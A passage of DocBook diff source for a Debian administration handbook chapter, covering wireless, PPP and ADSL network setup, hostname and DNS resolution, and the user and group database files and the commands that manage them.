+				 <indexterm>
+					<primary>WPA</primary>
+				</indexterm>
+				 <para>
+					<emphasis>ifupdown</emphasis> is able to manage wireless interfaces but it needs the help of the <emphasis role="pkg">wpasupplicant</emphasis> package which provides the required integration between <emphasis>ifupdown</emphasis> and the <command>wpa_supplicant</command> command used to configure the wireless interfaces (when using WPA/WPA2 encryption). The usual entry in <filename>/etc/network/interfaces</filename> needs to be extended with two supplementary parameters to specify the name of the wireless network (aka its SSID) and the <emphasis>Pre-Shared Key</emphasis> (PSK).
+				</para>
+				 <example id="example.config-wireless">
+					<title>DHCP configuration for a wireless interface</title>
+					 
+<programlisting>
+auto wlp4s0
+iface wlp4s0 inet dhcp
+  wpa-ssid Falcot
+  wpa-psk ccb290fd4fe6b22935cbae31449e050edd02ad44627b16ce0151668f5f53c01b
+</programlisting>
+				</example>
+				 <para>
+					The <literal>wpa-psk</literal> parameter can contain either the plain text passphrase or its hashed version generated with <command>wpa_passphrase <replaceable>SSID</replaceable> <replaceable>passphrase</replaceable></command>. If you use an unencrypted wireless connection, then you should put a <literal>wpa-key-mgmt NONE</literal> and no <literal>wpa-psk</literal> entry. For more information about the possible configuration options, have a look at <filename>/usr/share/doc/wpasupplicant/README.Debian.gz</filename>.
+				</para>
+				 <para>
+					At this point, you should consider restricting the read permissions on <filename>/etc/network/interfaces</filename> to the root user only since the file contains a private key that not all users should have access to.
+				</para>
+				 <sidebar> <title><emphasis>HISTORY</emphasis> WEP encryption</title>
+				 <indexterm>
+					<primary>WEP</primary>
+				</indexterm>
+				 <para>
+					Usage of the deprecated WEP encryption protocol is possible with the <emphasis role="pkg">wireless-tools</emphasis> package. See <filename>/usr/share/doc/wireless-tools/README.Debian</filename> for instructions.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section id="sect.ppp-rtc">
+			<title>Connecting with PPP through a PSTN Modem</title>
+			 <indexterm>
+				<primary>PPP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>point to point</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>connection</primary>
+				<secondary>by PSTN modem</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>modem</primary>
+				<secondary>PSTN</secondary>
+			</indexterm>
+			 <para>
+				A point to point (PPP) connection establishes an intermittent connection; this is the most common solution for connections made with a telephone modem (“PSTN modem”, since the connection goes over the public switched telephone network).
+			</para>
+			 <para>
+				A connection by telephone modem requires an account with an access provider, including a telephone number, username, password, and, sometimes the authentication protocol to be used. Such a connection is configured using the <command>pppconfig</command> tool in the Debian package of the same name. By default, it sets up a connection named <literal>provider</literal> (as in Internet service provider). When in doubt about the authentication protocol, choose <emphasis>PAP</emphasis>: it is offered by the majority of Internet service providers.
+			</para>
+			 <indexterm>
+				<primary><command>pppconfig</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>PAP</primary>
+			</indexterm>
+			 <para>
+				After configuration, it is possible to connect using the <command>pon</command> command (giving it the name of the connection as a parameter, when the default value of <literal>provider</literal> is not appropriate). The link is disconnected with the <command>poff</command> command. These two commands can be executed by the root user, or by any other user, provided they are in the <literal>dip</literal> group.
+			</para>
+			 <indexterm>
+				<primary><command>pon</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>poff</command></primary>
+			</indexterm>
+
+		</section>
+		 <section id="sect.adsl">
+			<title>Connecting through an ADSL Modem</title>
+			 <indexterm>
+				<primary>connection</primary>
+				<secondary>by ADSL modem</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>modem</primary>
+				<secondary>ADSL</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>ADSL, modem</primary>
+			</indexterm>
+			 <para>
+				The generic term “ADSL modem” covers a multitude of devices with very different functions. The modems that are simplest to use with Linux are those that have an Ethernet interface (and not only a USB interface). These tend to be popular; most ADSL Internet service providers lend (or lease) a “box” with Ethernet interfaces. Depending on the type of modem, the configuration required can vary widely.
+			</para>
+			 <section id="sect.adsl-pppoe">
+				<title>Modems Supporting PPPOE</title>
+				 <indexterm>
+					<primary>PPPOE</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>pppoeconf</command></primary>
+				</indexterm>
+				 <para>
+					Some Ethernet modems work with the PPPOE protocol (Point to Point Protocol over Ethernet). The <command>pppoeconf</command> tool (from the package with the same name) will configure the connection. To do so, it modifies the <filename>/etc/ppp/peers/dsl-provider</filename> file with the settings provided and records the login information in the <filename>/etc/ppp/pap-secrets</filename> and <filename>/etc/ppp/chap-secrets</filename> files. It is recommended to accept all modifications that it proposes.
+				</para>
+				 <para>
+					Once this configuration is complete, you can open the ADSL connection with the command, <command>pon dsl-provider</command> and disconnect with <command>poff dsl-provider</command>.
+				</para>
+				 <indexterm>
+					<primary><literal>dsl-provider</literal></primary>
+				</indexterm>
+				 <sidebar> <title><emphasis>TIP</emphasis> Starting <command>ppp</command> at boot</title>
+				 <indexterm>
+					<primary><command>systemd</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>init</command></primary>
+				</indexterm>
+				 <para>
+					PPP connections over ADSL are, by definition, intermittent. Since they are usually not billed according to time, there are few downsides to the temptation of keeping them always open. The standard means to do so is to use the init system.
+				</para>
+				 <para>
+					With systemd, adding an automatically restarting task for the ADSL connection is a simple matter of creating a “unit file” such as <filename>/etc/systemd/system/adsl-connection.service</filename>, with contents such as the following:
+				</para>
+				 
+<programlisting>[Unit]
+Description=ADSL connection
+
+[Service]
+Type=forking
+ExecStart=/usr/sbin/pppd call dsl-provider
+Restart=always
+
+[Install]
+WantedBy=multi-user.target</programlisting>
+				 <para>
+					Once this unit file has been defined, it needs to be enabled with <command>systemctl enable adsl-connection</command>. Then the loop can be started manually with <command>systemctl start adsl-connection</command>; it will also be started automatically on boot.
+				</para>
+				 <para>
+					On systems not using <command>systemd</command> (including <emphasis role="distribution">Wheezy</emphasis> and earlier versions of Debian), the standard SystemV init works differently. On such systems, all that is needed is to add a line such as the following at the end of the <filename>/etc/inittab</filename> file; then, any time the connection is disconnected, <command>init</command> will reconnect it.
+				</para>
+				 
+<programlisting>
+adsl:2345:respawn:/usr/sbin/pppd call dsl-provider
+</programlisting>
+				 <para>
+					For ADSL connections that auto-disconnect on a daily basis, this method reduces the duration of the interruption.
+				</para>
+				 </sidebar>
+			</section>
+			 <section id="sect.adsl-pptp">
+				<title>Modems Supporting PPTP</title>
+				 <indexterm>
+					<primary>PPTP</primary>
+				</indexterm>
+				 <para>
+					The PPTP (Point-to-Point Tunneling Protocol) protocol was created by Microsoft. Deployed at the beginning of ADSL, it was quickly replaced by PPPOE. If this protocol is forced on you, see <xref linkend="sect.pptp" />.
+				</para>
+
+			</section>
+			 <section id="sect.adsl-dhcp">
+				<title>Modems Supporting DHCP</title>
+				 <para>
+					When a modem is connected to the computer by an Ethernet cable (crossover cable) you typically configure a network connection by DHCP on the computer; the modem automatically acts as a gateway by default and takes care of routing (meaning that it manages the network traffic between the computer and the Internet).
+				</para>
+				 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Crossover cable for a direct Ethernet connection</title>
+				 <indexterm>
+					<primary>crossover cable</primary>
+				</indexterm>
+				 <para>
+					Computer network cards expect to receive data on specific wires in the cable, and send their data on others. When you connect a computer to a local network, you usually connect a cable (straight or crossover) between the network card and a repeater or switch. However, if you want to connect two computers directly (without an intermediary switch or repeater), you must route the signal sent by one card to the receiving side of the other card, and vice-versa. This is the purpose of a crossover cable, and the reason it is used.
+				</para>
+				 <para>
+					Note that this distinction has become almost irrelevant over time, as modern network cards are able do detect the type of cable present and adapt accordingly, so it won't be unusual that both kinds of cable will work in a given location.
+				</para>
+				 </sidebar> <para>
+					Most “ADSL routers” on the market can be used like this, as do most of the ADSL modems provided by Internet services providers.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.roaming-network-config">
+			<title>Automatic Network Configuration for Roaming Users</title>
+			 <indexterm>
+				<primary><emphasis role="pkg">network-manager</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>network</primary>
+				<secondary>roaming configuration</secondary>
+			</indexterm>
+			 <para>
+				Many Falcot engineers have a laptop computer that, for professional purposes, they also use at home. The network configuration to use differs according to location. At home, it may be a wifi network (protected by a WPA key), while the workplace uses a wired network for greater security and more bandwidth.
+			</para>
+			 <para>
+				To avoid having to manually connect or disconnect the corresponding network interfaces, administrators installed the <emphasis role="pkg">network-manager</emphasis> package on these roaming machines. This software enables a user to easily switch from one network to another using a small icon displayed in the notification area of their graphical desktop. Clicking on this icon displays a list of available networks (both wired and wireless), so they can simply choose the network they wish to use. The program saves the configuration for the networks to which the user has already connected, and automatically switches to the best available network when the current connection drops.
+			</para>
+			 <para>
+				In order to do this, the program is structured in two parts: a daemon running as root handles activation and configuration of network interfaces and a user interface controls this daemon. PolicyKit handles the required authorizations to control this program and Debian configured PolicyKit in such a way so that members of the netdev group can add or change Network Manager connections.
+			</para>
+			 <para>
+				Network Manager knows how to handle various types of connections (DHCP, manual configuration, local network), but only if the configuration is set with the program itself. This is why it will systematically ignore all network interfaces in <filename>/etc/network/interfaces</filename> for which it is not suited. Since Network Manager doesn't give details when no network connections are shown, the easy way is to delete from <filename>/etc/network/interfaces</filename> any configuration for all interfaces that must be managed by Network Manager.
+			</para>
+			 <para>
+				Note that this program is installed by default when the “Desktop Environment” task is chosen during initial installation.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.hostname-name-service">
+		<title>Setting the Hostname and Configuring the Name Service</title>
+		 <indexterm>
+			<primary>name</primary>
+			<secondary>attribution and resolution</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>assignment of names</primary>
+		</indexterm>
+		 <para>
+			The purpose of assigning names to IP numbers is to make them easier for people to remember. In reality, an IP address identifies a network interface associated with a device such as a network card. Since each machine can have several network cards, and several interfaces on each card, one single computer can have several names in the domain name system.
+		</para>
+		 <para>
+			Each machine is, however, identified by a main (or “canonical”) name, stored in the <filename>/etc/hostname</filename> file and communicated to the Linux kernel by initialization scripts through the <command>hostname</command> command. The current value is available in a virtual filesystem, and you can get it with the <command>cat /proc/sys/kernel/hostname</command> command.
+		</para>
+		 <indexterm>
+			<primary><command>hostname</command></primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> <filename>/proc/</filename> and <filename>/sys/</filename>, virtual filesystems</title>
+		 <indexterm>
+			<primary><filename>/proc/</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>proc</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>/sys/</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>sys</filename></primary>
+		</indexterm>
+		 <para>
+			The <filename>/proc/</filename> and <filename>/sys/</filename> file trees are generated by “virtual” filesystems. This is a practical means of recovering information from the kernel (by listing virtual files) and communicating them to it (by writing to virtual files).
+		</para>
+		 <para>
+			<filename>/sys/</filename> in particular is designed to provide access to internal kernel objects, especially those representing the various devices in the system. The kernel can, thus, share various pieces of information: the status of each device (for example, if it is in energy saving mode), whether it is a removable device, etc. Note that <filename>/sys/</filename> has only existed since kernel version 2.6.
+		</para>
+		 </sidebar> <para>
+			Surprisingly, the domain name is not managed in the same way, but comes from the complete name of the machine, acquired through name resolution. You can change it in the <filename>/etc/hosts</filename> file; simply write a complete name for the machine there at the beginning of the list of names associated with the address of the machine, as in the following example:
+		</para>
+		 <informalexample> 
+<programlisting>
+127.0.0.1     localhost
+192.168.0.1   arrakis.falcot.com arrakis
+</programlisting>
+		 </informalexample> <indexterm>
+			<primary><filename>hosts</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>/etc/hosts</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>domain</primary>
+			<secondary>name</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>name</primary>
+			<secondary>domain</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>NSS</primary>
+		</indexterm>
+		 <section id="sect.name-resolution">
+			<title>Name Resolution</title>
+			 <indexterm>
+				<primary>resolution</primary>
+				<secondary>name</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>name</primary>
+				<secondary>resolution</secondary>
+			</indexterm>
+			 <para>
+				The mechanism for name resolution in Linux is modular and can use various sources of information declared in the <filename>/etc/nsswitch.conf</filename> file. The entry that involves host name resolution is <literal>hosts</literal>. By default, it contains <literal>files dns</literal>, which means that the system consults the <filename>/etc/hosts</filename> file first, then DNS servers. NIS/NIS+ or LDAP servers are other possible sources.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> NSS and DNS</title>
+			 <para>
+				Be aware that the commands specifically intended to query DNS (especially <command>host</command>) do not use the standard name resolution mechanism (NSS). As a consequence, they do not take into consideration <filename>/etc/nsswitch.conf</filename>, and thus, not <filename>/etc/hosts</filename> either.
+			</para>
+			 </sidebar> <section id="sect.dns-server-configuration">
+				<title>Configuring DNS Servers</title>
+				 <indexterm>
+					<primary>DNS</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Domain Name Service</primary>
+				</indexterm>
+				 <para>
+					DNS (Domain Name Service) is a distributed and hierarchical service mapping names to IP addresses, and vice-versa. Specifically, it can turn a human-friendly name such as <literal>www.eyrolles.com</literal> into the actual IP address, <literal>213.244.11.247</literal>.
+				</para>
+				 <para>
+					To access DNS information, a DNS server must be available to relay requests. Falcot Corp has its own, but an individual user is more likely to use the DNS servers provided by their ISP.
+				</para>
+				 <indexterm>
+					<primary><filename>resolv.conf</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>nameserver</literal></primary>
+				</indexterm>
+				 <para>
+					The DNS servers to be used are indicated in the <filename>/etc/resolv.conf</filename>, one per line, with the <literal>nameserver</literal> keyword preceding an IP address, as in the following example:
+				</para>
+				 
+<programlisting>
+nameserver 212.27.32.176
+nameserver 212.27.32.177
+nameserver 8.8.8.8
+</programlisting>
+				 <para>
+					Note that the <filename>/etc/resolv.conf</filename> file may be handled automatically (and overwritten) when the network is managed by NetworkManager or configured via DHCP.
+				</para>
+
+			</section>
+			 <section id="sect.etc-hosts">
+				<title>The <filename>/etc/hosts</filename> file</title>
+				 <indexterm>
+					<primary><filename>hosts</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>/etc/hosts</filename></primary>
+				</indexterm>
+				 <para>
+					If there is no name server on the local network, it is still possible to establish a small table mapping IP addresses and machine hostnames in the <filename>/etc/hosts</filename> file, usually reserved for local network stations. The syntax of this file is very simple: each line indicates a specific IP address followed by the list of any associated names (the first being “completely qualified”, meaning it includes the domain name).
+				</para>
+				 <para>
+					This file is available even during network outages or when DNS servers are unreachable, but will only really be useful when duplicated on all the machines on the network. The slightest alteration in correspondence will require the file to be updated everywhere. This is why <filename>/etc/hosts</filename> generally only contains the most important entries.
+				</para>
+				 <para>
+					This file will be sufficient for a small network not connected to the Internet, but with 5 machines or more, it is recommended to install a proper DNS server.
+				</para>
+				 <sidebar> <title><emphasis>TIP</emphasis> Bypassing DNS</title>
+				 <para>
+					Since applications check the <filename>/etc/hosts</filename> file before querying DNS, it is possible to include information in there that is different from what the DNS would return, and therefore to bypass normal DNS-based name resolution.
+				</para>
+				 <para>
+					This allows, in the event of DNS changes not yet propagated, to test access to a website with the intended name even if this name is not properly mapped to the correct IP address yet.
+				</para>
+				 <para>
+					Another possible use is to redirect traffic intended for a specific host to the localhost, thus preventing any communication with the given host. For example, hostnames of servers dedicated to serving ads could be diverted which would bypass these ads resulting in more fluid, less distracting, navigation.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.user-group-databases">
+		<title>User and Group Databases</title>
+		 <indexterm>
+			<primary>user</primary>
+			<secondary>database</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>group</primary>
+			<secondary>database</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>database</primary>
+			<secondary>of users</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>database</primary>
+			<secondary>of groups</secondary>
+		</indexterm>
+		 <para>
+			The list of users is usually stored in the <filename>/etc/passwd</filename> file, while the <filename>/etc/shadow</filename> file stores encrypted passwords. Both are text files, in a relatively simple format, which can be read and modified with a text editor. Each user is listed there on a line with several fields separated with a colon (“<literal>:</literal>”).
+		</para>
+		 <sidebar> <title><emphasis>NOTE</emphasis> Editing system files</title>
+		 <para>
+			The system files mentioned in this chapter are all plain text files, and can be edited with a text editor. Considering their importance to core system functionality, it is always a good idea to take extra precautions when editing system files. First, always make a copy or backup of a system file before opening or altering it. Second, on servers or machines where more than one person could potentially access the same file at the same time, take extra steps to guard against file corruption.
+		</para>
+		 <para>
+			For this purpose, it is enough to use the <command>vipw</command> command to edit the <filename>/etc/passwd</filename> file, or <command>vigr</command> to edit <filename>/etc/group</filename>. These commands lock the file in question prior to running the text editor, (<command>vi</command> by default, unless the <varname>EDITOR</varname> environment variable has been altered). The <literal>-s</literal> option in these commands allows editing the corresponding <foreignphrase>shadow</foreignphrase> file.
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Crypt, a one-way function</title>
+		 <indexterm>
+			<primary>crypt</primary>
+		</indexterm>
+		 <para>
+			<command>crypt</command> is a one-way function that transforms a string (<varname>A</varname>) into another string (<varname>B</varname>) in a way that <varname>A</varname> cannot be derived from <varname>B</varname>. The only way to identify <varname>A</varname> is to test all possible values, checking each one to determine if transformation by the function will produce <varname>B</varname> or not. It uses up to 8 characters as input (string <varname>A</varname>) and generates a string of 13, printable, ASCII characters (string <varname>B</varname>).
+		</para>
+		 </sidebar> <section id="sect.etc-passwd">
+			<title>User List: <filename>/etc/passwd</filename></title>
+			 <para>
+				Here is the list of fields in the <filename>/etc/passwd</filename> file:
+			</para>
+			 <indexterm>
+				<primary><command>passwd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/passwd</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>uid</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>gid</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>GECOS</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>login</literal></primary>
+			</indexterm>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						login, for example <literal>rhertzog</literal>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						password: this is a password encrypted by a one-way function (<command>crypt</command>), relying on <literal>DES</literal>, <literal>MD5</literal>, <literal>SHA-256</literal> or <literal>SHA-512</literal>. The special value “<literal>x</literal>” indicates that the encrypted password is stored in <filename>/etc/shadow</filename>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>uid</literal>: unique number identifying each user;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>gid</literal>: unique number for the user's main group (Debian creates a specific group for each user by default);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>GECOS</literal>: data field usually containing the user's full name;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						login directory, assigned to the user for storage of their personal files (the environment variable <varname>$HOME</varname> generally points here);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						program to execute upon login. This is usually a command interpreter (shell), giving the user free rein. If you specify <command>/bin/false</command> (which does nothing and returns control immediately), the user cannot login.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Unix group</title>
+			 <indexterm>
+				<primary>group</primary>
+			</indexterm>
+			 <para>
+				A Unix group is an entity including several users so that they can easily share files using the integrated permission system (by benefiting from the same rights). You can also restrict use of certain programs to a specific group.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.etc-shadow">
+			<title>The Hidden and Encrypted Password File: <filename>/etc/shadow</filename></title>
+			 <indexterm>
+				<primary><filename>shadow</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/shadow</filename></primary>
+			</indexterm>
+			 <para>
+				The <filename>/etc/shadow</filename> file contains the following fields:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						login;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						encrypted password;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						several fields managing password expiration.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> <filename>/etc/passwd</filename>, <filename>/etc/shadow</filename> and <filename>/etc/group</filename> file formats</title>
+			 <para>
+				These formats are documented in the following man pages: <citerefentry><refentrytitle>passwd</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry>, <citerefentry><refentrytitle>shadow</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry>, and <citerefentry><refentrytitle>group</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry>.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>SECURITY</emphasis> <filename>/etc/shadow</filename> file security</title>
+			 <para>
+				<filename>/etc/shadow</filename>, unlike its alter-ego, <filename>/etc/passwd</filename>, cannot be read by regular users. Any encrypted password stored in <filename>/etc/passwd</filename> is readable by anybody; a cracker could try to “break” (or reveal) a password by one of several “brute force” methods which, simply put, guess at commonly used combinations of characters. This attack — called a "dictionary attack" — is no longer possible on systems using <filename>/etc/shadow</filename>.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.account-modification">
+			<title>Modifying an Existing Account or Password</title>
+			 <indexterm>
+				<primary><command>chsh</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>chfn</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>passwd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>chage</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>password</primary>
+			</indexterm>
+			 <para>
+				The following commands allow modification of the information stored in specific fields of the user databases: <command>passwd</command> permits a regular user to change their password, which in turn, updates the <filename>/etc/shadow</filename> file; <command>chfn</command> (CHange Full Name), reserved for the super-user (root), modifies the <literal>GECOS</literal> field. <command>chsh</command> (CHange SHell) allows the user to change their login shell, however available choices will be limited to those listed in <filename>/etc/shells</filename>; the administrator, on the other hand, is not bound by this restriction and can set the shell to any program of their choosing.
+			</para>
+			 <para>
+				Finally, the <command>chage</command> (CHange AGE) command allows the administrator to change the password expiration settings (the <literal>-l <replaceable>user</replaceable></literal> option will list the current settings). You can also force the expiration of a password using the <command>passwd -e <replaceable>user</replaceable></command> command, which will require the user to change their password the next time they log in.
+			</para>
+
+		</section>
+		 <section id="sect.disabling-account">
+			<title>Disabling an Account</title>
+			 <indexterm>
+				<primary>Disable an account</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>account</primary>
+				<secondary>disable</secondary>
+			</indexterm>
+			 <para>
+				You may find yourself needing to “disable an account” (lock out a user), as a disciplinary measure, for the purposes of an investigation, or simply in the event of a prolonged or definitive absence of a user. A disabled account means the user cannot login or gain access to the machine. The account remains intact on the machine and no files or data are deleted; it is simply inaccessible. This is accomplished by using the command <command>passwd -l <replaceable>user</replaceable></command> (lock). Re-enabling the account is done in similar fashion, with the <literal>-u</literal> option (unlock).
+			</para>
+			 <sidebar id="sidebar.intro-nss"> <title><emphasis>GOING FURTHER</emphasis> NSS and system databases</title>
+			 <indexterm>
+				<primary>NSS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Name Service Switch</primary>
+			</indexterm>
+			 <para>
+				Instead of using the usual files to manage lists of users and groups, you could use other types of databases, such as LDAP or <command>db</command>, by using an appropriate NSS (Name Service Switch) module. The modules used are listed in the <filename>/etc/nsswitch.conf</filename> file, under the <literal>passwd</literal>, <literal>shadow</literal> and <literal>group</literal> entries. See <xref linkend="sect.config-nss" /> for a specific example of the use of an NSS module by LDAP.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.etc-group">
+			<title>Group List: <filename>/etc/group</filename></title>
+			 <para>
+				Groups are listed in the <filename>/etc/group</filename> file, a simple textual database in a format similar to that of the <filename>/etc/passwd</filename> file, with the following fields:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						group name;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						password (optional): This is only used to join a group when one is not a usual member (with the <command>newgrp</command> or <command>sg</command> commands, see sidebar <xref linkend="sidebar.working-with-several-groups" />);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>gid</literal>: unique group identification number;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						list of members: list of names of users who are members of the group, separated by commas.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+			</para>
+			 <sidebar id="sidebar.working-with-several-groups"> <title><emphasis>BACK TO BASICS</emphasis> Working with several groups</title>
+			 <indexterm>
+				<primary><command>newgrp</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>sg</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>id</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>group</primary>
+				<secondary>change</secondary>
+			</indexterm>
+			 <para>
+				Each user may be a member of many groups; one of them is their “main group”. A user's main group is, by default, created during initial user configuration. By default, each file that a user creates belongs to them, as well as to their main group. This is not always desirable; for example, when the user needs to work in a directory shared by a group other than their main group. In this case, the user needs to change their main group using one of the following commands: <command>newgrp</command>, which starts a new shell, or <command>sg</command>, which simply executes a command using the supplied alternate group. These commands also allow the user to join a group to which they do not belong. If the group is password protected, they will need to supply the appropriate password before the command is executed.
+			</para>
+			 <para>
+				Alternatively, the user can set the <literal>setgid</literal> bit on the directory, which causes files created in that directory to automatically belong to the correct group. For more details, see sidebar <xref linkend="sidebar.setgid-dir" />.
+			</para>
+			 <para>
+				The <command>id</command> command displays the current state of a user, with their personal identifier (<varname>uid</varname> variable), current main group (<varname>gid</varname> variable), and the list of groups to which they belong (<varname>groups</varname> variable).
+			</para>
+			 </sidebar> <indexterm>
+				<primary><filename>group</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/group</filename></primary>
+			</indexterm>
+			 <para>
+				The <command>addgroup</command> and <command>delgroup</command> commands add or delete a group, respectively. The <command>groupmod</command> command modifies a group's information (its <literal>gid</literal> or identifier). The command <command>gpasswd <replaceable>group</replaceable></command> changes the password for the group, while the <command>gpasswd -r <replaceable>group</replaceable></command> command deletes it.
+			</para>
+			 <indexterm>
+				<primary><command>addgroup</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>delgroup</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>groupmod</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>gpasswd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>group</primary>
+				<secondary>creation</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>creation</primary>
+				<secondary>of groups</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>group</primary>
+				<secondary>deletion</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>deletion of a group</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>TIP</emphasis> <command>getent</command></title>
+			 <indexterm>
+				<primary><command>getent</command></primary>
+			</indexterm>
+			 <para>
+				The <command>getent</command> (get entries) command checks the system databases the standard way, using the appropriate library functions, which in turn call the NSS modules configured in the <filename>/etc/nsswitch.conf</filename> file. The command takes one or two arguments: the name of the database to check, and a possible search key. Thus, the command <command>getent passwd rhertzog</command> will give the information from the user database regarding the user <literal>rhertzog</literal>.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.creating-accounts">
+		<title>Creating Accounts</title>
+		 <indexterm>
+			<primary>account</primary>
+			<secondary>creation</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>creation</primary>
+			<secondary>of user accounts</secondary>
+		</indexterm>
+		 <para>
+			One of the first actions an administrator needs to do when setting up a new machine is to create user accounts. This is typically done using the <command>adduser</command> command which takes a user-name for the new user to be created, as an argument.
+		</para>
+		 <indexterm>
+			<primary><command>adduser</command></primary>
+		</indexterm>
+		 <para>
+			The <command>adduser</command> command asks a few questions before creating the account, but its usage is fairly straightforward. Its configuration file, <filename>/etc/adduser.conf</filename>, includes all the interesting settings: it can be used to automatically set a quota for each new user by creating a user template, or to change the location of user accounts; the latter is rarely useful, but it comes in handy when you have a large number of users and want to divide their accounts over several disks, for instance. You can also choose a different default shell.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Quota</title>
+		 <indexterm>
+			<primary>quota</primary>
+		</indexterm>
+		 <para>
+			The term “quota” refers to a limit on machine resources that a user is allowed to use. This frequently refers to disk space.
+		</para>
+		 </sidebar> <para>
+			The creation of an account populates the user's home directory with the contents of the <filename>/etc/skel/</filename> template. This provides the user with a set of standard directories and configuration files.
+		</para>
+		 <indexterm>
+			<primary>group</primary>
+			<secondary>add a user</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>add a user to a group</primary>
+		</indexterm>
+		 <para>
+			In some cases, it will be useful to add a user to a group (other than their default “main” group) in order to grant them additional permissions. For example, a user who is included in the <emphasis>audio</emphasis> group can access audio devices (see sidebar <xref linkend="sidebar.special-files" />). This can be achieved with a command such as <command>adduser <replaceable>user</replaceable> <replaceable>group</replaceable></command>.
+		</para>
+		 <sidebar id="sidebar.special-files"> <title><emphasis>BACK TO BASICS</emphasis> Device access permissions</title>
+		 <indexterm>
+			<primary>device</primary>
+			<secondary>access permissions</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>file</primary>
+			<secondary>special</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>mode</primary>
+			<secondary>character</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>mode</primary>
+			<secondary>block</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>block, mode</primary>
+		</indexterm>
